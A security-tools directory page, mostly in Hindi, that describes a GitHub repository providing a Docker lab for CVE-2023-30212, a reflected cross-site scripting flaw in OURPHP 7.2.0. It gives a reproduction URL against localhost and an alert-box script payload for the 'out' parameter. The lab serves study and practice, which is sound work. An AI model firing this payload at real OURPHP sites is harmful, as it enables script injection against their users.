Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — यह रिपॉजिटरी CVE-2023-30212 भेद्यता का अनुकरण करने के लिए एक डॉकर कंटेनर प्रदान करती है, जिससे आप इसके प्रभाव का अभ्यास और समझ सकते हैं। इसमें आपके अपने कंप्यूटर पर कंटेनर स्थापित करने में मदद करने के लिए एक व्यापक मार्गदर्शिका शामिल है। डॉकर निर्माण प्रक्रिया के लिए दस्तावेज़ीकरण भी शामिल है। | Kitploit
उपकरण/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

रिपॉजिटरी देखें
1113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह रिपॉजिटरी CVE-2023-30212 भेद्यता का अनुकरण करने के लिए एक डॉकर कंटेनर प्रदान करती है, जिससे आप इसके प्रभाव का अभ्यास और समझ सकते हैं। इसमें आपके अपने कंप्यूटर पर कंटेनर स्थापित करने में मदद करने के लिए एक व्यापक मार्गदर्शिका शामिल है। डॉकर निर्माण प्रक्रिया के लिए दस्तावेज़ीकरण भी शामिल है।

साझा करें

CVE-2023-30212 POC : क्रॉस-साइट स्क्रिप्टिंग

/client/manage/ourphp_out.php के माध्यम से

CVE-2023-30212 से प्रभावित उत्पाद :

विक्रेताउत्पादसंस्करण
ourphpourphp7.2.0

डॉकर स्थापना गाइड :

डॉकर में OURPHP <= 7.2.0 स्थापित करने के लिए आप अभ्यास हेतु डॉकर स्थापित करने के लिए गाइड का उपयोग कर सकते हैं।

कमजोरी का विवरण:

root@kitploit:~
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

समस्या को पुनरुत्पादित करने के चरण:

root@kitploit:~
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

कमजोरी के लिए पेलोड:

root@kitploit:~
# </script><script>alert(`xss`)</script>

वीडियो

CVE-2023-30212

संदर्भ

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> संदर्भ के लिए कोड
टूल डाउनलोड करें